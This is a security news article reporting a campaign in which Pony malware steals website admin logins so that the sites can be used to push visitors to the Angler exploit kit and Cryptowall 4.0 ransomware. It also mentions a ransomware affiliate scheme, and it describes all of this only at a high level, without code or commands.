Oh no, you're thinking, yet another cookie pop-up. Well, sorry, it's the law. We measure how many people read us, and ensure you see relevant ads, by storing cookies on your device. If you're cool with that, hit “Accept all Cookies”. For more info and to customize your settings, hit “Customize Settings”.

Review and manage your consent

Here's an overview of our use of cookies, similar technologies and how to manage them. You can also change your choices at any time, by hitting the “Your Consent Options” link on the site's footer.

Manage Cookie Preferences
  • These cookies are strictly necessary so that you can navigate the site as normal and use all features. Without these cookies we cannot provide you with the service that you expect.

  • These cookies are used to make advertising messages more relevant to you. They perform functions like preventing the same ad from continuously reappearing, ensuring that ads are properly displayed for advertisers, and in some cases selecting advertisements that are based on your interests.

  • These cookies collect information in aggregate form to help us understand how our websites are being used. They allow us to count visits and traffic sources so that we can measure and improve the performance of our sites. If people say no to these cookies, we do not know how many people have visited and we cannot monitor performance.

See also our Cookie policy and Privacy policy.

This article is more than 1 year old

Domination: Crims steal admin logins, infect sites, drop Cryptowall 4

World's worst password-stealer + world's worst exploit kit + world's worst ransomware.

Virus slingers who find themselves unsatisfied by merely ruining computers with ransomware are now first stealing a victim's admin passwords to enslave their websites into attack campaigns.

The battery starts with the installation of the Pony malware, which in 2013 stole some two million passwords through its global botnet.

Pony can also plunder passwords from more than 100 applications, social media sites, and Google accounts.

It is not clear how that initial Pony infection takes place, however.

Heimdal Security bod Andra Zaharia says stolen passwords are used to upload scripts to a victim's site before users are pushed to malicious drive-by-download pages.

There the infamous Angler exploit kit delivers the as-yet insurmountable Cryptowall 4.0 ransomware.

"The campaign is carried out by installing a cocktail of malware on the compromised PC … which systematically harvests all usable usernames and passwords from the infected system and sends them to a series of control and command servers controlled by the attackers," Zaharia says.

"The Angler exploit kit will then scan for vulnerabilities in popular third party software and in insecure Microsoft Windows processes, if the system hasn’t been updated.

"Once the security holes are identified, Angler will exploit them and force-feed Cryptowall 4.0 into the victim’s system."

Zaharia says the campaign is "extensive" and operates from six bulletproof hosting servers in Ukraine.

It is one of the most complex and likely effective ransomware attacks to date that makes use of the latest Cryptowall variant released less than a month ago and Angler, the world's most effective and popular exploit kit.

Other web scum have taken to recruiting victims into an affiliate program.

Chimera has begun recruiting ransomware victims into an affiliate program where they can gain a 50 percent profit split for spreading the malware, Trend Micro threat man Anthony Joe Melgarejo says.

They are not excused from paying the one Bitcoin ransom, however. ®

 

Similar topics

TIP US OFF

Send us news


Other stories you might like